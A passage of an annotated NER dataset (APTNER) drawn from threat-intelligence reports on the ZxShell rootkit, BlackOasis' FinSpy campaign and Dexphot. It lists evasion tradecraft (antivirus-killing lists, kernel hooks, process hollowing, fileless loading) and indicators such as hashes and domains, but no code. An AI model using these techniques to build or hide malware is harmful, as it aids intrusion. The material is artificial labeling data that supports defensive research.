0x88888888 : Set a special value called “ type ” in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain .", "spans": {"Malware: ZxShell": [[237, 244]], "System: Windows": [[325, 332]]}, "info": {"id": "aptner_train_001695", "source": "aptner_train"}} {"text": "The second Loveusd system thread does a lot of things .", "spans": {"System: Loveusd": [[11, 18]]}, "info": {"id": "aptner_train_001696", "source": "aptner_train"}} {"text": "Its principal duties are to create the ZxShell main DLL in “ c:\\Windows\\System32\\commhlp32.dll ” and to install the Kernel “ Load Image Notify routine ” .", "spans": {"Malware: ZxShell": [[39, 46]], "System: DLL": [[52, 55]], "Indicator: c:\\Windows\\System32\\commhlp32.dll": [[61, 94]], "System: Load Image Notify routine": [[125, 150]]}, "info": {"id": "aptner_train_001697", "source": "aptner_train"}} {"text": "The code then tries to kill each process and service that belongs to the following list of AV products : Symantec Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes .", "spans": {"System: Symantec Firewall": [[105, 122]], "System: Norton": [[123, 129]], "Organization: ESET": [[130, 134]], "Organization: McAfee": [[135, 141]], "System: Avast": [[142, 147]], "System: Avira": [[148, 153]], "Organization: Sophos": [[154, 160]], "System: Malwarebytes": [[161, 173]]}, "info": {"id": "aptner_train_001698", "source": "aptner_train"}} {"text": "Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting .", "spans": {"Malware: ZxShell": [[11, 18]]}, "info": {"id": "aptner_train_001699", "source": "aptner_train"}} {"text": "The installation procedure continues in the user-mode dropper .", "spans": {}, "info": {"id": "aptner_train_001700", "source": "aptner_train"}} {"text": "The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call .", "spans": {"Malware: 
ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001701", "source": "aptner_train"}} {"text": "This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 .", "spans": {"System: windows": [[39, 46]]}, "info": {"id": "aptner_train_001702", "source": "aptner_train"}} {"text": "The ZxShell hook code knows that and intercept it .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001703", "source": "aptner_train"}} {"text": "ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) .", "spans": {}, "info": {"id": "aptner_train_001704", "source": "aptner_train"}} {"text": "The hook installed by ZxShell implements one of its filtering routine .", "spans": {"Malware: ZxShell": [[22, 29]]}, "info": {"id": "aptner_train_001705", "source": "aptner_train"}} {"text": "It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the “ netstat.exe ” file .", "spans": {"Malware: ZxShell": [[36, 43]], "System: DLL": [[73, 76]], "Indicator: netstat.exe": [[110, 121]]}, "info": {"id": "aptner_train_001706", "source": "aptner_train"}} {"text": "The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe .", "spans": {"Indicator: Svchost.exe": [[83, 94]], "Indicator: Lsass.exe": [[97, 106]], "Indicator: Winlogon.exe": [[109, 121]], "Indicator: Services.exe": [[124, 136]], "Indicator: Csrss.exe": [[139, 148]], "Indicator: ctfmon.exe": [[151, 161]], "Indicator: Rundll32.exe": [[164, 176]], "Indicator: mpnotify.exe": [[179, 191]], "Indicator: update.exe": [[194, 204]]}, "info": {"id": "aptner_train_001707", "source": "aptner_train"}} {"text": "If the type of the object that the 
system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry .", "spans": {"Malware: ZxShell": [[138, 145]], "System: windows": [[161, 168]]}, "info": {"id": "aptner_train_001708", "source": "aptner_train"}} {"text": "The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook .", "spans": {"Malware: ZxShell": [[42, 49]]}, "info": {"id": "aptner_train_001709", "source": "aptner_train"}} {"text": "In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile .", "spans": {"Malware: ZxShell": [[17, 24]]}, "info": {"id": "aptner_train_001710", "source": "aptner_train"}} {"text": "Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server .", "spans": {"System: Command and Control": [[0, 19]], "Indicator: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[47, 111]]}, "info": {"id": "aptner_train_001711", "source": "aptner_train"}} {"text": "The symbol “ g_bCreateListenSck ” is set to 1 .", "spans": {}, "info": {"id": "aptner_train_001712", "source": "aptner_train"}} {"text": "This means that , as seen above , the ZxShell Dll is started in listening mode .", "spans": {"Malware: ZxShell": [[38, 45]], "System: Dll": [[46, 49]]}, "info": {"id": "aptner_train_001713", "source": "aptner_train"}} {"text": "It connects to the first remote C&C that tries to contact it and succeeds in the handshake .", "spans": {"System: C&C": [[32, 35]]}, "info": {"id": "aptner_train_001714", "source": "aptner_train"}} {"text": "The encrypted IP address is “ 127.0.0.2 ” ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) .", 
"spans": {"Indicator: 127.0.0.2": [[30, 39]]}, "info": {"id": "aptner_train_001715", "source": "aptner_train"}} {"text": "We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above .", "spans": {"Malware: ZxShell": [[12, 19]], "Indicator: 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4": [[56, 120]], "System: CNC panel": [[167, 176]]}, "info": {"id": "aptner_train_001716", "source": "aptner_train"}} {"text": "The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we ’ve deciphered the functionality .", "spans": {"System: Google Translate": [[50, 66]]}, "info": {"id": "aptner_train_001717", "source": "aptner_train"}} {"text": "Once an infected machine connects , you see its information displayed in a selection box at the top .", "spans": {}, "info": {"id": "aptner_train_001718", "source": "aptner_train"}} {"text": "There are some built in functions on the side for the more common features .", "spans": {}, "info": {"id": "aptner_train_001719", "source": "aptner_train"}} {"text": "These include remote desktop , webcam spying , remote shell , and file management .", "spans": {}, "info": {"id": "aptner_train_001720", "source": "aptner_train"}} {"text": "You can also select a host and type help for a full list of commands .", "spans": {}, "info": {"id": "aptner_train_001721", "source": "aptner_train"}} {"text": "I have the same machine infected with two different version of ZxShell .", "spans": {"Malware: ZxShell": [[63, 70]]}, "info": {"id": "aptner_train_001722", "source": "aptner_train"}} {"text": "Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 .", "spans": {}, "info": {"id": "aptner_train_001723", "source": "aptner_train"}} {"text": "Keylogging , ZXARPS ( IP and URL spoofing 
) , and SYNFlood are some of the interesting features added to version 3.2 .", "spans": {"Malware: ZXARPS": [[13, 19]]}, "info": {"id": "aptner_train_001724", "source": "aptner_train"}} {"text": "In versions 3.1 – 3.21, the configuration info is xor encoded with 0x85 .", "spans": {}, "info": {"id": "aptner_train_001725", "source": "aptner_train"}} {"text": "This configuration info can be changed with a tool included in the ZxShell package .", "spans": {"Malware: ZxShell": [[67, 74]]}, "info": {"id": "aptner_train_001726", "source": "aptner_train"}} {"text": "In versions 3.22 and 3.39 the routine changes .", "spans": {}, "info": {"id": "aptner_train_001727", "source": "aptner_train"}} {"text": "The new xor encoding byte is 0x5B .", "spans": {}, "info": {"id": "aptner_train_001728", "source": "aptner_train"}} {"text": "The data is stored in the last 0x100 bytes of the file .", "spans": {}, "info": {"id": "aptner_train_001729", "source": "aptner_train"}} {"text": "The first 8 bytes of data are static .", "spans": {}, "info": {"id": "aptner_train_001730", "source": "aptner_train"}} {"text": "Then there is the dll install name , the domain , and the port .", "spans": {"System: dll": [[18, 21]]}, "info": {"id": "aptner_train_001731", "source": "aptner_train"}} {"text": "Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored .", "spans": {}, "info": {"id": "aptner_train_001732", "source": "aptner_train"}} {"text": "The most common ports used are , 80, 1985, 1986, and 443 . 
1985 is the default port for the malware , 1986 is the lazy variation of that port .", "spans": {}, "info": {"id": "aptner_train_001733", "source": "aptner_train"}} {"text": "Port 80 and 443 are the default ports for HTTP and HTTPS traffic .", "spans": {}, "info": {"id": "aptner_train_001734", "source": "aptner_train"}} {"text": "The next most common is port 53 .", "spans": {}, "info": {"id": "aptner_train_001735", "source": "aptner_train"}} {"text": "This is used in some of the newer 3.22 and 3.39 samples .", "spans": {}, "info": {"id": "aptner_train_001736", "source": "aptner_train"}} {"text": "After that , the count for each port starts declining sharply .", "spans": {}, "info": {"id": "aptner_train_001737", "source": "aptner_train"}} {"text": "The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) .", "spans": {}, "info": {"id": "aptner_train_001738", "source": "aptner_train"}} {"text": "Since this malware dates back to around 2004 , there are many samples containing CNC URLs from the 3322.org page .", "spans": {"System: CNC": [[81, 84]], "Indicator: 3322.org": [[99, 107]]}, "info": {"id": "aptner_train_001739", "source": "aptner_train"}} {"text": "This page used to offer no-ip type hosting and was widely used by malware authors .", "spans": {}, "info": {"id": "aptner_train_001740", "source": "aptner_train"}} {"text": "So much so that Microsoft did a takedown in 2012 .", "spans": {"Organization: Microsoft": [[16, 25]]}, "info": {"id": "aptner_train_001741", "source": "aptner_train"}} {"text": "A similar service , vicp.net , is also seen in many of the domains .", "spans": {"Indicator: vicp.net": [[20, 28]]}, "info": {"id": "aptner_train_001742", "source": "aptner_train"}} {"text": "In the malware , if a domain is configured , it will 
retrieve domain.tld / myIP .", "spans": {"Indicator: domain.tld": [[62, 72]]}, "info": {"id": "aptner_train_001743", "source": "aptner_train"}} {"text": "txt .", "spans": {"Indicator: txt": [[0, 3]]}, "info": {"id": "aptner_train_001744", "source": "aptner_train"}} {"text": "This file contains a list of IP addresses for the infected machine to connect back to .", "spans": {}, "info": {"id": "aptner_train_001745", "source": "aptner_train"}} {"text": "Otherwise , if an IP address is configured , it will connect directly to that IP address .", "spans": {}, "info": {"id": "aptner_train_001746", "source": "aptner_train"}} {"text": "We have written a simple C++ ZxShell Server that implements the communication and the handshake for the version 3.10 and 3.20 of the ZxShell DLL .", "spans": {"Malware: ZxShell": [[29, 36], [133, 140]], "System: DLL": [[141, 144]]}, "info": {"id": "aptner_train_001747", "source": "aptner_train"}} {"text": "The implementation is quite simple : After the handshake , 2 threads that deal with data transfer are spawned .", "spans": {}, "info": {"id": "aptner_train_001748", "source": "aptner_train"}} {"text": "Advanced persistent threats will remain a problem for companies and organizations of all sizes , especially those with high financial or intellectual property value .", "spans": {}, "info": {"id": "aptner_train_001749", "source": "aptner_train"}} {"text": "Group 72 ’s involvement in Operation SMN is another example of what sort of damage that can be done if organizations are not diligent in their efforts to secure their networks .", "spans": {"Organization: Group 72": [[0, 8]]}, "info": {"id": "aptner_train_001750", "source": "aptner_train"}} {"text": "ZxShell is one sample amongst several tools that Group 72 used within their campaign .", "spans": {"Malware: ZxShell": [[0, 7]], "Organization: Group 72": [[49, 57]]}, "info": {"id": "aptner_train_001751", "source": "aptner_train"}} {"text": "ZxShell is a sophisticated tool employed by Group 72 
that contains all kinds of functionality .", "spans": {"Malware: ZxShell": [[0, 7]], "Organization: Group 72": [[44, 52]]}, "info": {"id": "aptner_train_001752", "source": "aptner_train"}} {"text": "Its detection and removal can be difficult due to the various techniques used to conceal its presence , such as disabling the host anti-virus , masking its installation on a system with a valid service name , and by masking outbound traffic as originating from a web browser .", "spans": {}, "info": {"id": "aptner_train_001753", "source": "aptner_train"}} {"text": "While other techniques are also utilized to conceal and inhibit its removal , ZxShell ’s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine .", "spans": {"Malware: ZxShell": [[78, 85]], "System: Remote Administration Tool": [[126, 152]], "System: RAT": [[155, 158]], "Malware: backdoor": [[208, 216]]}, "info": {"id": "aptner_train_001754", "source": "aptner_train"}} {"text": "As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information .", "spans": {"Malware: ZxShell": [[31, 38]]}, "info": {"id": "aptner_train_001755", "source": "aptner_train"}} {"text": "The threat posed by ZxShell to organizations is one that cannot be ignored .", "spans": {"Malware: ZxShell": [[20, 27]]}, "info": {"id": "aptner_train_001756", "source": "aptner_train"}} {"text": "Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee ’s are educated about the security threats their organizations face .", "spans": {}, "info": {"id": "aptner_train_001757", "source": "aptner_train"}} {"text": "Threat Spotlight : Group 72 , Opening the ZxShell .", "spans": {"Organization: Group 72": [[19, 27]], "Malware: ZxShell": [[42, 49]]}, "info": {"id": 
"aptner_train_001758", "source": "aptner_train"}} {"text": "The incident , as described by security researchers with Moscow-based cybersecurity firm Kaspersky Lab , shines a rare light on the opaque although apparently vibrant market for software exploits and spyware , which in this case appears to have been purchased by a nation-state .", "spans": {"Organization: Kaspersky Lab": [[89, 102]], "Malware: spyware": [[200, 207]]}, "info": {"id": "aptner_train_001760", "source": "aptner_train"}} {"text": "The Middle Eastern hacker group in this case is codenamed “ BlackOasis . ” Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of “ FinSpy ” malware , according to a new blog post published Monday .", "spans": {"Organization: BlackOasis": [[60, 70]], "Organization: Kaspersky": [[75, 84]], "System: Adobe Flash Player": [[118, 136]], "Vulnerability: zero-day": [[137, 145]], "Vulnerability: CVE-2016-4117": [[162, 175]], "Malware: FinSpy": [[222, 228]]}, "info": {"id": "aptner_train_001761", "source": "aptner_train"}} {"text": "Adobe issued a fix Monday to its users in the form of a software update .", "spans": {"Organization: Adobe": [[0, 5]]}, "info": {"id": "aptner_train_001762", "source": "aptner_train"}} {"text": "These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object .", "spans": {"System: emails": [[6, 12]], "System: Microsoft Word documents": [[33, 57]], "Vulnerability: Flash Player zero-day": [[82, 103]], "System: ActiveX object": [[130, 144]]}, "info": {"id": "aptner_train_001765", "source": "aptner_train"}} {"text": "The term zero-day is indicative of a software flaw that remains unknown to the software ’s creator .", "spans": {"Vulnerability: zero-day": [[9, 17]]}, "info": {"id": "aptner_train_001767", "source": "aptner_train"}} {"text": "Zero-days can be highly disruptive because 
they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole .", "spans": {"Vulnerability: Zero-days": [[0, 9]]}, "info": {"id": "aptner_train_001768", "source": "aptner_train"}} {"text": "U.S . cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit — more specifically , a SOAP WSDL parser code injection vulnerability — to install FinSpy onto a small number of devices .", "spans": {"Organization: FireEye": [[25, 32]], "Organization: BlackOasis": [[56, 66]], "Vulnerability: zero-day": [[144, 152]], "System: SOAP WSDL": [[185, 194]], "Malware: FinSpy": [[244, 250]]}, "info": {"id": "aptner_train_001769", "source": "aptner_train"}} {"text": "Again , the attacker ’s intention appeared to be espionage . “ Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , ” explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab .", "spans": {"Organization: FinFisher": [[76, 85]], "Organization: BlackOasis": [[147, 157]], "Organization: Kaspersky Lab": [[324, 337]]}, "info": {"id": "aptner_train_001770", "source": "aptner_train"}} {"text": "Gamma Group has been accused of selling its products to authoritarian regimes that can use the technology to both track dissidents and conduct foreign espionage over the internet .", "spans": {"Organization: Gamma Group": [[0, 11]]}, "info": {"id": "aptner_train_001771", "source": "aptner_train"}} {"text": "It ’s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . 
“ BlackOasis ’ interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region .", "spans": {"Malware: spyware": [[66, 73]], "Organization: Gamma Group": [[99, 110]], "Organization: BlackOasis": [[189, 199]]}, "info": {"id": "aptner_train_001773", "source": "aptner_train"}} {"text": "This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , ” a blogpost about Kaspersky ’s findings reads .", "spans": {"Organization: Kaspersky": [[146, 155]]}, "info": {"id": "aptner_train_001774", "source": "aptner_train"}} {"text": "The post continues , “ during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities .", "spans": {}, "info": {"id": "aptner_train_001775", "source": "aptner_train"}} {"text": "There is also an interest in international activists and think tanks … Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . ”", "spans": {"Organization: BlackOasis": [[82, 92]]}, "info": {"id": "aptner_train_001776", "source": "aptner_train"}} {"text": "Intent was clearly espionage in many cases , going outside of that \"lawful surveillance\" boundary.— Brian Bartholomew ( @Mao_Ware ) October 16, 2017 Brian Bartholomew , a senior security researcher with Kaspersky , said on Twitter that BlackOasis ’ espionage included non-traditional targets — “ going outside of that lawful surveillance boundary. 
”", "spans": {"Organization: Kaspersky": [[203, 212]], "System: Twitter": [[223, 230]], "Organization: BlackOasis": [[236, 246]]}, "info": {"id": "aptner_train_001777", "source": "aptner_train"}} {"text": "An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis ’ operations .", "spans": {"Organization: Microsoft": [[63, 72]], "Organization: Neodymium": [[87, 96]], "Organization: BlackOasis": [[126, 136]]}, "info": {"id": "aptner_train_001778", "source": "aptner_train"}} {"text": "Last year , Microsoft researchers described Neodymium ’s behavior as unusual : “ unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"Organization: Microsoft": [[12, 21]], "Organization: Neodymium": [[44, 53]], "Organization: PROMETHIUM": [[188, 198]], "Organization: NEODYMIUM": [[203, 212]]}, "info": {"id": "aptner_train_001779", "source": "aptner_train"}} {"text": "These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region .", "spans": {"Vulnerability: zero-day": [[65, 73]]}, "info": {"id": "aptner_train_001780", "source": "aptner_train"}} {"text": "Their targets , however , appear to be individuals that do not share common affiliations. 
”", "spans": {}, "info": {"id": "aptner_train_001781", "source": "aptner_train"}} {"text": "A cursory review of BlackOasis ’ espionage campaign suggests there is some overlap between the group ’s actions and Saudi Arabia ’s geopolitical interests .", "spans": {"Organization: BlackOasis": [[20, 30]]}, "info": {"id": "aptner_train_001782", "source": "aptner_train"}} {"text": "For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola ’s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time .", "spans": {"Organization: Angolan organizations": [[31, 52]]}, "info": {"id": "aptner_train_001783", "source": "aptner_train"}} {"text": "In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory .", "spans": {"Malware: spyware": [[50, 57]], "Organization: Citizen Lab": [[114, 125]]}, "info": {"id": "aptner_train_001785", "source": "aptner_train"}} {"text": "Kaspersky ’s research notes that BlackOasis hacked into computers based in Saudi Arabia .", "spans": {"Organization: Kaspersky": [[0, 9]], "Organization: BlackOasis": [[33, 43]]}, "info": {"id": "aptner_train_001786", "source": "aptner_train"}} {"text": "Insights from one year of tracking a polymorphic threat .", "spans": {}, "info": {"id": "aptner_train_001787", "source": "aptner_train"}} {"text": "A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding .", "spans": {}, "info": {"id": "aptner_train_001788", "source": "aptner_train"}} {"text": "We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices .", "spans": {}, "info": {"id": "aptner_train_001789", "source": "aptner_train"}} {"text": "We gave the threat 
the name “ Dexphot , ” based on certain characteristics of the malware code .", "spans": {"Malware: Dexphot": [[30, 37]]}, "info": {"id": "aptner_train_001790", "source": "aptner_train"}} {"text": "The Dexphot attack used a variety of sophisticated methods to evade security solutions .", "spans": {"Malware: Dexphot": [[4, 11]]}, "info": {"id": "aptner_train_001791", "source": "aptner_train"}} {"text": "Layers of obfuscation , encryption , and the use of randomized file names hid the installation process .", "spans": {}, "info": {"id": "aptner_train_001792", "source": "aptner_train"}} {"text": "Dexphot then used fileless techniques to run malicious code directly in memory , leaving only a few traces that can be used for forensics .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001793", "source": "aptner_train"}} {"text": "It hijacked legitimate system processes to disguise malicious activity .", "spans": {}, "info": {"id": "aptner_train_001794", "source": "aptner_train"}} {"text": "If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware .", "spans": {"Malware: Dexphot": [[17, 24]]}, "info": {"id": "aptner_train_001795", "source": "aptner_train"}} {"text": "In the months that followed , we closely tracked the threat and witnessed the attackers upgrade the malware , target new processes , and work around defensive measures .", "spans": {}, "info": {"id": "aptner_train_001796", "source": "aptner_train"}} {"text": "While Microsoft Defender Advanced Threat Protection ’s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through .", "spans": {"System: Microsoft Defender Advanced Threat Protection": [[6, 51]], "Malware: Dexphot": [[95, 102]]}, "info": {"id": "aptner_train_001797", "source": "aptner_train"}} 
{"text": "Given the threat ’s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors .", "spans": {}, "info": {"id": "aptner_train_001798", "source": "aptner_train"}} {"text": "Microsoft Defender ATP data shows the effectiveness of behavioral blocking and containment capabilities in stopping the Dexphot campaign .", "spans": {"System: Microsoft Defender": [[0, 18]], "Malware: Dexphot": [[120, 127]]}, "info": {"id": "aptner_train_001799", "source": "aptner_train"}} {"text": "Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam .", "spans": {}, "info": {"id": "aptner_train_001800", "source": "aptner_train"}} {"text": "Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat .", "spans": {"Malware: Dexphot": [[24, 31]]}, "info": {"id": "aptner_train_001801", "source": "aptner_train"}} {"text": "More importantly , one year ’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot ’s authors , but of cybercriminals in general .", "spans": {"Malware: Dexphot": [[119, 126]]}, "info": {"id": "aptner_train_001802", "source": "aptner_train"}} {"text": "The early stages of a Dexphot infection involves numerous files and processes .", "spans": {"Malware: Dexphot": [[22, 29]]}, "info": {"id": "aptner_train_001803", "source": "aptner_train"}} {"text": "During the execution stage , Dexphot writes five key files to disk :", "spans": {}, "info": {"id": "aptner_train_001804", "source": "aptner_train"}} {"text": "1 、An installer with two URLs ;", "spans": {}, "info": {"id": "aptner_train_001805", "source": "aptner_train"}} {"text": "2 、An MSI package file downloaded from one of the URLs ;", "spans": {"System: MSI": [[6, 9]]}, "info": {"id": "aptner_train_001806", 
"source": "aptner_train"}} {"text": "3 、A password-protected ZIP archive ;", "spans": {}, "info": {"id": "aptner_train_001807", "source": "aptner_train"}} {"text": "4 、A loader DLL , which is extracted from the archive ;", "spans": {"System: DLL": [[12, 15]]}, "info": {"id": "aptner_train_001808", "source": "aptner_train"}} {"text": "5 、An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing .", "spans": {}, "info": {"id": "aptner_train_001809", "source": "aptner_train"}} {"text": "Except for the installer , the other processes that run during execution are legitimate system processes .", "spans": {}, "info": {"id": "aptner_train_001810", "source": "aptner_train"}} {"text": "This can make detection and remediation more difficult .", "spans": {}, "info": {"id": "aptner_train_001811", "source": "aptner_train"}} {"text": "These legitimate system processes include msiexec.exe ( for installing MSI packages ) , unzIP .", "spans": {"Indicator: msiexec.exe": [[42, 53]], "System: MSI": [[71, 74]], "System: unzIP": [[88, 93]]}, "info": {"id": "aptner_train_001812", "source": "aptner_train"}} {"text": "exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) .", "spans": {"Indicator: exe": [[0, 3]], "Indicator: rundll32.exe": [[71, 83]], "System: DLL": [[109, 112]], "Indicator: schtasks.exe": [[117, 129]], "Indicator: powershell.exe": [[156, 170]]}, "info": {"id": "aptner_train_001813", "source": "aptner_train"}} {"text": "In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe .", "spans": {"Malware: Dexphot": [[18, 25]], "Indicator: svchost.exe": [[87, 98]], "Indicator: tracert.exe": [[101, 112]], "Indicator: setup.exe": [[119, 128]]}, "info": {"id": "aptner_train_001814", "source": "aptner_train"}} 
{"text": "Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot installer .", "spans": {"System: Microsoft Defender": [[9, 27]], "Malware: SoftwareBundler : Win32/ICLoader": [[42, 74]], "Malware: Dexphot installer": [[131, 148]]}, "info": {"id": "aptner_train_001815", "source": "aptner_train"}} {"text": "The installer uses two URLs to download malicious payloads .", "spans": {}, "info": {"id": "aptner_train_001816", "source": "aptner_train"}} {"text": "These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device .", "spans": {"Malware: Dexphot": [[33, 40]]}, "info": {"id": "aptner_train_001817", "source": "aptner_train"}} {"text": "The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install .", "spans": {"System: MSI": [[27, 30]], "Indicator: msiexec.exe": [[84, 95]]}, "info": {"id": "aptner_train_001818", "source": "aptner_train"}} {"text": "This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes .", "spans": {"Malware: Dexphot": [[42, 49]]}, "info": {"id": "aptner_train_001819", "source": "aptner_train"}} {"text": "Dexphot ’s package often contains an obfuscated batch script .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001820", "source": "aptner_train"}} {"text": "If the package contains this file , the script is the first thing that msiexec.exe runs when it begins the installation process .", "spans": {"Indicator: msiexec.exe": [[71, 82]]}, "info": {"id": "aptner_train_001821", "source": "aptner_train"}} {"text": "The said obfuscated script is designed to check for antivirus products .", "spans": {}, "info": {"id": "aptner_train_001822", "source": "aptner_train"}} {"text": "Dexphot halts the infection process immediately if an 
antivirus product is found running .", "spans": {"Malware: Dexphot": [[0, 7]]}, "info": {"id": "aptner_train_001823", "source": "aptner_train"}} {"text": "When we first began our research , the batch script only checked for antivirus products from Avast and AVG .", "spans": {"System: Avast": [[93, 98]], "System: AVG": [[103, 106]]}, "info": {"id": "aptner_train_001824", "source": "aptner_train"}} {"text": "Later , Windows Defender Antivirus was added to the checklist .", "spans": {"System: Windows Defender Antivirus": [[8, 34]]}, "info": {"id": "aptner_train_001825", "source": "aptner_train"}} {"text": "If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package .", "spans": {"Malware: Dexphot": [[31, 38]], "System: MSI": [[96, 99]]}, "info": {"id": "aptner_train_001826", "source": "aptner_train"}} {"text": "The password to this archive is within the MSI package .", "spans": {"System: MSI": [[43, 46]]}, "info": {"id": "aptner_train_001827", "source": "aptner_train"}} {"text": "Along with the password , the malware ’s authors also include a clean version of unzIP .", "spans": {"System: unzIP": [[81, 86]]}, "info": {"id": "aptner_train_001828", "source": "aptner_train"}} {"text": "exe so that they do n’t have to rely on the target system having a ZIP utility .", "spans": {"Indicator: exe": [[0, 3]], "System: ZIP utility": [[67, 78]]}, "info": {"id": "aptner_train_001829", "source": "aptner_train"}} {"text": "The unzIP .", "spans": {"System: unzIP": [[4, 9]]}, "info": {"id": "aptner_train_001830", "source": "aptner_train"}} {"text": "exe file in the package is usually named various things , such as z.exe or ex.exe , to avoid scrutiny .", "spans": {"Indicator: exe": [[0, 3]], "Indicator: z.exe": [[66, 71]], "Indicator: ex.exe": [[75, 81]]}, "info": {"id": "aptner_train_001831", "source": "aptner_train"}} {"text": "The ZIP archive usually contains three files : the loader DLL , an encrypted data file ( usually named 
bin.dat ) , and , often , one clean unrelated DLL , which is likely included to mislead detection .", "spans": {"System: the loader DLL": [[47, 61]], "Indicator: bin.dat": [[103, 110]], "System: clean unrelated DLL": [[133, 152]]}, "info": {"id": "aptner_train_001832", "source": "aptner_train"}} {"text": "Dexphot usually extracts the decompressed files to the target system ’s Favorites folder .", "spans": {"Malware: Dexphot": [[0, 7]], "System: Favorites folder": [[72, 88]]}, "info": {"id": "aptner_train_001833", "source": "aptner_train"}} {"text": "The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\\\Favorites\\\\Res.Center.ponse\\ ) .", "spans": {}, "info": {"id": "aptner_train_001834", "source": "aptner_train"}} {"text": "Msiexec.exe next calls rundll32.exe , specifying loader DLL ( urlmon.7z in the example above ) in order to decrypt the data file .", "spans": {"Indicator: Msiexec.exe": [[0, 11]], "Indicator: rundll32.exe": [[23, 35]], "System: loader DLL": [[49, 59]], "Indicator: urlmon.7z": [[62, 71]], "Malware: decrypt the data file": [[107, 128]]}, "info": {"id": "aptner_train_001835", "source": "aptner_train"}} {"text": "The decryption process involves ADD and XOR operations , using a key hardcoded in the binary .", "spans": {}, "info": {"id": "aptner_train_001836", "source": "aptner_train"}} {"text": "The decrypted data contains three 